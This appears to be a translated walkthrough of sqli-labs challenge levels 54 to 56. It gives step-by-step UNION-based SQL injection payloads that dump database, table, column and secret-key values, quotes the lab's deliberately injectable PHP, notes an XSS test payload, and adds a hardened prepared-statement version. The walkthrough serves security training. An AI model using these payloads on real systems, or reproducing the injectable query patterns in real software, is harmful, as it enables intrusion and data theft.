Sqli-labs walkthrough summary, page 4
2022-07-02 06:55:00 【Xu Jirong】
less-54 (GET, single-quote closure, union query)
less-55 (GET, numeric closure with parentheses, union query)
less-56 (GET, single quote with parentheses, union query)
less-54
Title: GET - challenge - Union - 10 queries allowed - Variation 1
This is where it starts to get interesting: only 10 queries are allowed.
Step one: test the closure
?id=1'

No echo, so double quotes are ruled out.
Step two: test the closure
?id=1"

Numeric closure is ruled out; the query is closed with single quotes.
Step three: test the closure
?id=1' --+

Confirmed: closed with ''.
Step four: find the number of columns in the query
This step is tricky: with bad luck you cannot find it within the limit. I still use binary search here.
?id=1' order by 4 --+

Error, so the query has fewer than 4 columns.
Step five: find the number of columns in the query
?id=1' order by 3 --+

The query has 3 columns.
Step six: find the echo positions on the page, and echo the database name at the same time
?id=-1' union select database(),database(),database() --+

We get a database named challenges.
Step seven: get the table name
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

We get a table named rt85c5veac.
Step eight: get the column names
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='rt85c5veac'),3 --+

We get the column names: id, sessid, secret_F5D9, tryy. One of them is a secret column.
Step nine: get the column value
?id=-1' union select 1,(select group_concat(secret_F5D9) from rt85c5veac),3 --+

We obtain the key: e3GqUNpU23vQcA9K2fGxOrNz
Submit it, and the answer is accepted (OK).
Looking at the source code
The paste is incomplete; first look at index.php.
The code of this file is the same as before, except that the database is $dbname1 = "challenges";.
Now functions.php.
Many functions are defined; first look at the main part.
```php
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; //charset for dynamic generation of strings
// Generating a dynamic alfanumeric Table name with each purge.
$table = num_gen(10, $characters) ;
// Generating Secret key column.
$secret_key = "secret_".num_gen(4, $characters);
//retrieve dynamic table name from database.
```
It defines the string $characters and calls num_gen().
1. num_gen()
```php
function num_gen($string_length, $characters)
{
    $string = '';
    for ($i = 0; $i < $string_length; $i++)
    {
        $string .= $characters[rand(0, strlen($characters) - 1)];
    }
    return $string;
}
```
This function generates a random string of length $string_length from the characters ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.
So $table is a random string of length 10, and $secret_key is "secret_" followed by a random string of length 4.
Now the other functions.
2. table_name()
```php
function table_name()
{
    include '../sql-connections/db-creds.inc';
    include '../sql-connections/sql-connect-1.php';
    $sql="SELECT table_name FROM information_schema.tables WHERE table_schema='$dbname1'";
    $result=mysqli_query($con1, $sql) or die("error in function table_name()".mysqli_error($con1));
    $row = mysqli_fetch_array($result, MYSQLI_BOTH);
    if(!$row)
        die("error in function table_name() output". mysqli_error($con1));
    else
        return $row[0];
}
```
This function queries all tables in the challenges database and returns the first one.
3. column_name()
```php
function column_name($idee)
{
    include '../sql-connections/db-creds.inc';
    include '../sql-connections/sql-connect-1.php';
    $table = table_name();
    $sql="SELECT column_name FROM information_schema.columns WHERE table_name='$table' LIMIT $idee,1";
    $result=mysqli_query($con1, $sql) or die("error in function column_name()".mysqli_error($con1));
    $row = mysqli_fetch_array($result, MYSQLI_BOTH);
    if(!$row)
        die("error in function column_name() result". mysqli_error($con1));
    else
        return $row[0];
}
```
This function queries the columns of the first table in challenges; $idee selects which column via LIMIT, and that column name is returned.
4. data()
```php
function data($tab,$col)
{
    include '../sql-connections/db-creds.inc';
    include '../sql-connections/sql-connect-1.php';
    $sql="SELECT $col FROM $tab WHERE id=1";
    $result=mysqli_query($con1, $sql) or die("error in function column_name()".mysqli_error($con1));
    $row = mysqli_fetch_array($result, MYSQLI_BOTH);
    if(!$row)
        die("error in function column_name() result". mysqli_error($con1));
    else
        return $row[0];
}
```
This function queries table $tab and returns the value of column $col for the row with id=1.
5. next_tryy()
```php
function next_tryy()
{
    $table = table_name();
    //including the Mysql connect parameters.
    include '../sql-connections/db-creds.inc';
    include '../sql-connections/sql-connect-1.php';
    $sql = "UPDATE $table SET tryy=tryy+1 WHERE id=1";
    mysqli_query($con1, $sql) or die("error in function next_tryy()". mysqli_error($con1));
}
```
This function increments the tryy column of the row with id=1.
6. view_attempts()
```php
function view_attempts()
{
    include("../sql-connections/sql-connect-1.php");
    $table = table_name();
    $sql="SELECT tryy FROM $table WHERE id=1";
    $result=mysqli_query($con1, $sql) ;
    $row = mysqli_fetch_array($result, MYSQLI_BOTH);
    if(!$row)
        die("error in function view_attempts()". mysqli_error($con1));
    else
        return $row[0];
}
```
This function queries and returns the tryy value of the row with id=1.
Now the main page, index.php.
```php
$pag = $_SERVER['PHP_SELF'];
```
| Code | Description |
|---|---|
| $_SERVER['PHP_SELF'] | The file name of the currently executing script, relative to the document root. For example, a script at the address http://example.com/test.php/foo.bar that uses $_SERVER['PHP_SELF'] gets /test.php/foo.bar. The __FILE__ constant contains the full path and filename of the current (for example, included) file. |
Here the value of $pag is
/sqli/Less-54/index.php
```php
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
$times= 10;
$table = table_name();
$col = column_name(1); // session id column name
$col1 = column_name(2); //secret key column name
```
$times limits the number of queries; $table gets the table name in challenges (there is only one table); $col and $col1 get the two column names, which the comments say are the session id and the secret key.

'answer_key' is the Submit button below. It has no value before you click it, so the if block only runs afterwards.

'reset' is the button at the top that resets the level. It is empty by default, so the if block does not run; if you click it and submit, a new cookie is sent.

In the next part, if the cookie is not empty, the cookie value is added to the session id column of the table, and the cookie is given a lifetime of one month.

Then the id value is read from the front end. If it exists,
next_tryy() is called to increment tryy in the table,
and view_attempts() is called to display the tryy value.

Next it checks whether tryy has exceeded 10 attempts. If so, the cookie is deleted and the page redirects back, using the path obtained earlier in $pag.

The next part is the ordinary query that echoes values to the front end.

The last part handles whether the submitted key is correct.
Interestingly, it escapes the input twice, with addslashes() and mysqli_real_escape_string(). I did not find this useful, but if you submit
<script>alert(/xss/)</script>

you will find that there is an XSS vulnerability here.
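For comparison, here is the hardened shape of the two patterns the source above relies on: SQL built by string interpolation, as in `$sql="SELECT $col FROM $tab WHERE id=1"`, and raw echo of user input into HTML. This is an added example, not part of the original post or of sqli-labs; it assumes the lab's `$con1` mysqli connection and the `$table`/`$col1` values from index.php, and the identifier allow-list and the POST field name `key` are assumptions of mine.

```php
<?php
// Added example, not sqli-labs code. Assumes the lab's mysqli connection $con1
// and the $table / $col1 values that index.php derives from the schema.

// Identifiers (table and column names) cannot be bound as parameters, so they
// are validated against the character set the lab generates them from, then quoted.
function safe_identifier(string $name): string
{
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
        throw new InvalidArgumentException('unexpected identifier');
    }
    return '`' . $name . '`';
}

// Hardened form of data($tab,$col): id is bound as an integer, so how the
// original query was quoted (', ), or ')) no longer matters to the input.
function data_safe(mysqli $con1, string $tab, string $col, int $id): ?string
{
    $sql  = 'SELECT ' . safe_identifier($col) . ' FROM ' . safe_identifier($tab) . ' WHERE id = ?';
    $stmt = $con1->prepare($sql);
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($value);
    $found = $stmt->fetch();
    $stmt->close();
    return $found ? (string) $value : null;
}

// Output encoding: addslashes() and mysqli_real_escape_string() protect the SQL
// string context only; anything echoed into HTML needs htmlspecialchars().
function html_out(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// The lab's GET parameter: reject anything that is not an integer before it
// reaches the query, instead of escaping it.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT);
if ($id === null || $id === false) {
    http_response_code(400);
    exit('invalid id');
}
$key = data_safe($con1, $table, $col1, $id);
echo 'Your key: ' . html_out($key ?? '') . "\n";

// The submitted answer (form field name assumed), echoed back encoded:
// <script>alert(/xss/)</script> is rendered as inert text, not executed.
$answer = (string) ($_POST['key'] ?? '');
echo 'You submitted: ' . html_out($answer) . "\n";
```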
less-55
Title: GET - challenge - Union - 14 queries allowed - Variation 2
Step one: test the closure
?id=1'

No echo, so double quotes are ruled out.
Step two: test the closure
?id=1"

No echo, so single quotes are ruled out too; the closure is numeric.
Step three: test the closure
?id=1 --+

No echo, so continue by adding parentheses.
Step four: test the closure
?id=1) --+

Echo appears, so the closure is ().
Step five: find the number of columns in the query
?id=1) order by 4 --+

So the query has fewer than 4 columns.
Step six: find the number of columns in the query
?id=1) order by 3 --+

So the query has 3 columns.
Step seven: find the echo positions on the page, and echo the database name at the same time

We get the database name challenges.
Step eight: get the table name
?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

We get a table named b6gqo9qti7.
Step nine: get the column names
?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='b6gqo9qti7'),3 --+

We get the column names id, sessid, secret_UHTF, tryy.
Step ten: get the column value
?id=-1) union select 1,(select group_concat(secret_UHTF) from b6gqo9qti7),3 --+

We obtain the key: UUN75bQF8s7z116LDOpgUNp7

While doing this it struck me that, in less-54 as well, echoing the database name at the same time was a mistake, because then you cannot tell which two of 1,2,3 are the echo positions.
Also, apart from the closure, 55 is no different from 54.
less-56
Title: GET - challenge - Union - 14 queries allowed - Variation 3
Step one: test the closure
?id=1'

No echo, so double quotes are ruled out.
Step two: test the closure
?id=1"

Echo appears, so numeric closure is ruled out; the closure is a single quote.
Step three: test the closure
?id=1' --+

No echo, so continue by adding parentheses.
Step four: test the closure
?id=1') --+

Echo appears, so it is closed with ('').
Step five: find the number of columns in the query
?id=1') order by 4 --+

Error, so the query has fewer than 4 columns.
Step six: find the number of columns in the query
?id=1') order by 3 --+

Echo appears, so the query has 3 columns.
Step seven: check the echo positions on the page
?id=-1') union select 1,2,3 --+

Positions 2 and 3 are echoed.
Step eight: get the database name
?id=-1') union select 1,database(),3 --+

We get the database name: challenges
Step nine: get the table name
?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

We get the table name: 5ickf0b94k
Step ten: get the column names
?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5ickf0b94k'),3 --+

We get the column names: id, sessid, secret_PK1F, tryy
Step eleven: get the column value
?id=-1') union select 1,(select group_concat(secret_PK1F) from 5ickf0b94k),3 --+

We obtain the key: ZHMul4PlVGOjx8USXcH5Rgy6

Same as 55 and 54; only the closure changes to ('').
less-57
Title: GET - challenge - Union - 14 queries allowed - Variation 4